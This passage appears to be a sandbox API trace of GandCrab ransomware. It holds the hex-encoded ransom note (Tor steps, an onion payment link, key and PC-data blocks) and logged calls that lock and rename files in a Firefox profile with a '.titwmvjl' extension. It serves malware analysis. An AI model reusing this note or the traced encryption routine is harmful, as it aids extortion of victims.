\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0083.829] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0083.829] CloseHandle (hObject=0x2d4) returned 1 [0083.829] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.829] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.830] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x8c)) [0083.830] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.830] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.830] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.830] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock") returned 126 [0083.830] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0083.831] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.831] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.831] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\") returned 102 [0083.831] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*" [0083.831] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x5035b8 [0083.831] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.831] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0083.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.832] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0083.832] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0083.832] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0083.833] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock" [0083.833] lstrlenW (lpString=".titwmvjl") returned 9 [0083.833] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock") returned 126 [0083.833] VirtualAlloc (lpAddress=0x0, dwSize=0x13c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.833] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 135 [0083.833] lstrlenW 